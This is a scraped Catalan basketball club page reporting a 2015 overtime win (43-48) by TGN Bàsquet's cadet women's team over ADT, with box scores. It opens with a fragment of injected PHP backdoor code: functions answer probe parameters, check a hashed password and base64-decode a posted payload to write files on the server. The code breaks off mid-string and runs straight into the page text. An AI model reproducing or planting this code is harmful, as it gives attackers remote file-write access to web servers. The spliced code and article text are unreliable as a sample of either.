function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení C derrota l'ADT en la pròrroga (43-48) - Tgn Bàsquet Club -

El cadet femení C derrota l’ADT en la pròrroga (43-48)

Updated: març 11, 2015

Partit molt treballat per part del cadet femení C del TGN Bàsquet. L’equip que entrena Laureà Català va vèncer en la pròrroga l’ADT a domicili en un matx caracteritzat per les alternatives del domini en el marcador per ambdós equips i pels nombrosos tirs lliures fallats per les visitants (7/32).

El partit va travessar per diferents fases, amb domini altern per cadascun dels dos equips i no va ser fins el tercer quart quan el TGN Bàsquet va obrir una petita escletxa amb un parcial de 0-6 que encara va ser més important amb un altre parcial de 0-12 en l’últim quart (30-39). Malgrat tot, la lluita de l’ADT li va permetre igualar el matx (41-41) i forçar la pròrroga. En el temps extra, el cansament per les files locals (només 7 jugadores) i les eliminades per faltes, van provocar que l’ADT es quedés amb només 4 jugadores a pista i el TGN Bàsquet ho va aprofitar per vèncer .

ADT “GROC”     43

TGN “C”    48

ADT “GROC”: Marinez (6), Marin (3), Rodriguez (4), Mesa (12), Mouaz (8) – cinc inicial- Romera (6), Sancho (4). Triples 1: Marin. Tirs lliures 4/26. Faltes 23. Eliminades: Rodriguez 42’, Romera 45’.

TGN: Martin (5), Andres (11), Córcoles, Basterra (5), Monzón (6)– cinc inicial-  Gila, Prieto (4), Miro, López (4), Borràs (11), Capellades, Companys (2). Tirs lliures 7/32. Faltes 26. Eliminades: Companys 34’, Borras 40’, Martin 42’.

Parcials: 10-09/12-10 (22-19 descans) /08-08/11-14  (41-41 final)/ 2-7 Pròrroga (43-48)